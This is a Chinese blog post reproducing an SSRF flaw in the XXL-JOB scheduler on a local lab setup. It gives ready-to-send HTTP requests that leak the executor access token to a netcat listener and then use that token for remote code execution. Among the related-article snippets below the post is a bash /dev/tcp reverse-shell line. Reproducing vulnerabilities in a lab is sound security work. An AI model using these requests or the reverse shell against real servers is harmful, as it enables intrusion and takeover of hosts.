xxl-job ssrf漏洞复现

最新推荐文章于 2025-03-26 23:47:09 发布
最新推荐文章于 2025-03-26 23:47:09 发布
阅读量1.7k 收藏 8
点赞数 3
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/feigerger/article/details/135908102
版权

xxl-job ssrf漏洞复现

漏洞简介

XXL-JOB是基于java语言的分布式任务调度平台,该漏洞来自/trigger,直接向addressList指定的地址发送请求,不判断addressList参数是否为有效的执行器地址。它可以利用SSRF漏洞,攻击者获取XXL-JOB-ACCESS-TOKEN并调用任意执行器

漏洞复现

项目地址:https://github.com/xuxueli/xxl-job

搭建环境,配置JDBC与TOKEN

image-20240126102117589

image-20240126102149282

根据官方文档,需要将调度中心和执行器,设置了相同的AccessToken

image-20240126102310287

所以将执行器token也设为123

image-20240126102405241

启动项目进入登陆界面http://127.0.0.1:8080/xxl-job-admin/,默认密码admin/123456

image-20240126102606521

新建一个低权限测试账户test/123456

image-20240126102633145

登录低权限账户发现无法访问任务管理功能页面

image-20240126102845403

image-20240126102825960

构造poc

POST /xxl-job-admin/jobinfo/trigger HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 69
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: XXL_JOB_LOGIN_IDENTITY=7b226964223a322c22757365726e616d65223a2274657374222c2270617373776f7264223a226531306164633339343962613539616262653536653035376632306638383365222c22726f6c65223a302c227065726d697373696f6e223a22227d
Connection: close

id=1&executorParam=test&addressList=http%3A%2F%2F127.0.0.1%3A9090

开启一个nc监听端口9090,发送poc,查看泄露token

image-20240126103209960

RCE

构造payload

POST /run HTTP/1.1
Host: 127.0.0.1:9999
Content-Length: 69
XXL-JOB-ACCESS-TOKEN: 123
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close



{
        "jobId":1,                                  
        "executorHandler":"demoJobHandler",         
        "executorParams":"demoJobHandler",          
        "executorBlockStrategy":"COVER_EARLY",      
        "executorTimeout":0,                        
        "logId":1,                                  
        "logDateTime":1586629003729,                
        "glueType":"GLUE_POWERSHELL",                          
        "glueSource":"calc",                         
        "glueUpdatetime":1586629003727,             
        "broadcastIndex":0,                         
        "broadcastTotal":0                          
}

发送,即可发现计算机弹出

image-20240126110257270

Fredg0n
关注
XXL-JOB默认accessToken身份绕过RCE漏洞复现 [附POC]
薛定谔嘚喵博客
11-03 1178
XXL-JOB 是一款开源的分布式任务调度平台,用于实现大规模任务的调度和执行。XXL-JOB 默认配置下,用于调度通讯的 accessToken 不是随机生成的,而是使用 application.properties 配置文件中的默认值。在实际使用中如果没有修改默认值,攻击者可利用此绕过认证调用 executor,执行任意代码,从而获取服务器权限。经分析和研判,该漏洞利用难度低,可导致远程代码执行。
XXL-JOB任务调度中心后台命令执行漏洞
失心少年
08-20 1818
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!XXL-JOB任务调度中心后台存在命令执行漏洞,攻击者可在后台通过写入shell命令任务调度获取服务器控制权限。5、查看网站有回显,命令被成功执行。2、选择任务管理模块,新增任务。4、操作选择执行一次。
XXL-JOB 漏洞大全
yggcwhat
09-20 3308
XXL-JOB 漏洞大全
XXL-JOB默认accessToken身份绕过--远程代码执行漏洞复现
Tender*的博客
11-14 4218
漏洞是由于XXL-JOB 在默认配置下,用于调度通讯的 accessToken 不是随机生成的,而是使用 application.properties 配置文件中的默认值,如果用户没有修改该默认值,攻击者可利用此绕过认证调用 executor,执行任意代码,导致远程代码执行。链接:https://pan.baidu.com/s/12AkZ6JdpOm36bHrq1EEVPQ。XXL-JOB是一款开源的分布式任务调度平台,用于实现大规模任务的调度和执行。也可以尝试去搭建环境复现。三.网络空间测绘查询。
【紧急预警】xxl-job 2.5.0存在高危漏洞!一文教你彻底修复安全隐患
最新发布
wu858773457的专栏
03-26 635
本文针对xxl-job 2.5.0版本中的高危漏洞提供了全面的修复指南,包括漏洞分析、依赖升级方案、Docker镜像构建等内容。通过升级关键依赖组件,成功消除了安全扫描中的高危告警。文章还提供了完整的操作步骤和代码示例,帮助读者轻松实现安全加固,保障系统安全运行。
漏洞复现-XXL-JOB accessToken 存在身份认证绕过漏洞
玄道的网安博客
08-13 1619
官方已修复该漏洞,建议用户修改调度中心和执行器配置项 xxl.job.accessToken 的默认值。默认情况下是非空的,也就是xxl.job.accessToken=default_token。动态生效:用户在线通过Web IDE开发的任务代码,远程推送至执行器,实时加载执行。XXL-JOB为了灵活支持多语言以及脚本任务,提供了创新的 “是许雪里(XXL-JOB)社区的一款基于java语言的分布式任务调度平台。:任务以源码方式维护在调度中心,支持通过Web IDE在线开发、维护。
xxl-job反序列化漏洞分析复现
panda的博客
10-20 4917
xxl-job反序列化分析复现
XXL-JOB漏洞分析与利用
m0_63828240的博客
08-19 3184
在当今的数字化时代,任务调度平台对于企业级应用来说至关重要。它们负责自动化和协调各种时间敏感或周期性的任务,确保业务流程的顺畅运行。XXL-JOB作为一款流行的分布式任务调度平台,因其强大的功能和易用性,被广泛部署在各种规模的系统中。然而,随着其应用的普及,安全研究人员开始关注这些系统可能存在的潜在风险,一个漏洞的发现可能会导致数据泄露、服务中断甚至整个系统被控制。对于渗透测试人员来说,学习XXL-JOB漏洞原理,能够在一定程度上提升渗透能力。
XXL-JOB v2.4.0 发布 | 安全漏洞修复
许雪里
03-23 2263
XXL-JOB是一个轻量级分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-L8Hjsl4t-1586859195388)(https://upload-images.jianshu.io/upload_images/3165072-2124d438362d68e5.png “在这里输入图片标题”)]
红队专题-漏洞挖掘-代码审计-CSRF/SSRF/Xss
aming小老弟
03-11 1151
其中 Web A 为存在 CSRF 漏洞的网站,Web B 为攻击者构建的恶意网站,User C 为 Web A 网站的合法用户。用户 C 打开浏览器,访问受信任网站 A,输入用户名和密码请求登录网站A在用户信息通过验证后,网站 A 产生 Cookie 信息并返回给浏览器,此时用户登录网站 A 成功,可以正常发送请求到网站A用户未退出网站 A 之前,在同一浏览器中,打开一个 TAB 页访问网站 B网站 B 接收到用户请求后,返回一些攻击性代码,并发出一个请求要求访问第三方站点 A。
当下的网络安全行业前景到底怎么样?还能否入行?
2201_75735270的博客
11-16 201
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…从某种程度来讲,在网络安全领域,跟医生职业一样,越老越吃香,因为技术愈加成熟,自然工作会受到重视,升职加薪则是水到渠成之事。
XXL-JOB executor 未授权访问漏洞
黑白的博客
12-23 1413
声明 好好学习,天天向上 漏洞描述 XXL-JOB是一个分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。XXL-JOB分为admin和executor两端,前者为后台管理页面,后者是任务执行的客户端。executor默认没有配置认证,未授权的攻击者可以通过RESTful API执行任意命令。 影响范围 复现过程 这里使用2.2.0版本 使用vulhub /app/vulhub-master/xxl-job/unacc 使用docke
XXL-JOB executor 未授权访问漏洞复现
2301_76467680的博客
06-26 519
ip+端口 //8080管理端 9999客户端。向客户端发送如下数据包。//host为IP地址。
XXL-JOB 任务调度中心 后台任意命令执行漏洞
热门推荐
LiBai'S BLOG
10-17 3万+
在日常开发中,经常会用定时任务执行某些不紧急又非常重要的事情,例如批量结算,计算当日的订单量,当日的成本收入等。当存在大量定时任务的时候,任务的管理也会成为一个比较头痛的问题。XXL-JOB 任务调度中心系统存在后台命令执行漏洞,攻击者可以通过反弹shell执行任意命令,获取服务器管理权限。
XXL-JOB executor 未授权访问漏洞_xxl-job漏洞,拥有百万粉丝的大牛讲述学网络安全的历程
m0_61549674的博客
04-06 1223
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
漏洞实战(2):XXL-JOB默认密钥漏洞
OneMoreThink
03-20 3659
原理危害攻击搜索服务部署服务安装Java安装Maven安装XXL-JOB利用漏洞防御1、原理XXL-JOB[1]是一个分布式任务调度平台,分为调度中心和执行器两部分。在最新的两个版本中(2022年5月21日发布的2.3.1版本、2023年5月23日发布的2.4.0版本),XXL-JOB默认启用accessToken,在调度中心与执行器之间进行调度通讯时,用于证明自己的身份。accessToken的...
XXL-Job任务调度中心后台RCE和executor未授权访问漏洞
gzy1616的博客
01-10 1334
bin/bash -i >& /dev/tcp/监控ip/5555 0>&1。运行模式选择shell,使用在线的dnslog网站,判断出不出网。执行命令后刷新在线的Dnslog网站发现命令执行成功。首先我们在Linux中搭建好靶场。输入密码admin/123456。找到任务管理新建一个任务。
xxljob SSRF
01-25
### 关于XXL-JOB中的SSRF漏洞及其解决方法 #### SSRF漏洞概述 XXL-JOB是一个基于Java语言开发的分布式任务调度平台,在特定版本中存在的安全问题之一是SSRF(Server-Side Request Forgery)。当应用程序被诱导发起至内部网络或其他敏感位置的目标URL请求时,就会发生此类漏洞。对于XXL-JOB而言,`/trigger`接口允许攻击者通过设置`addressList`参数来触发向指定地址发出HTTP请求的行为,而无需验证这些地址的有效性和合法性[^2]。 #### 影响范围 此漏洞影响到XXL-JOB的所有<=2.3.1版本的产品实例。由于缺乏对外部输入数据的有效校验机制,使得恶意用户能够利用这一特性绕过防火墙限制,进而可能造成更严重的后果如远程代码执行(RCE)[^1]。 #### 解决方案与预防措施 ##### 更新软件版本 最直接有效的方式就是尽快升级到官方发布的最新稳定版程序,通常开发者会在新版本中修复已知的安全隐患。因此建议立即迁移到高于2.3.1以上的正式发行版本以获得更好的安全性保障[^4]。 ##### 输入验证加强 针对现有环境无法及时更新的情况,则应着重强化对用户提交内容特别是涉及到外部资源链接的部分进行严格过滤和白名单管理。具体来说就是在接收到任何有关目标主机名或IP地址之前先对其进行必要的解析处理,并仅限于接受那些事先定义好的可信源列表内的条目作为合法选项[^3]。 ##### 配置调整优化 除了上述两点外还可以考虑采取一些额外配置上的改进措施比如启用HTTPS协议加密通信通道防止中间人劫持篡改流量;关闭不必要的服务端口减少暴露面;以及定期审查日志文件查找异常活动迹象等等。 ```bash # 修改application.properties 或 application.yml 文件, 添加如下配置项 spring.http.client.connect-timeout=5000ms spring.http.client.read-timeout=10000ms ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值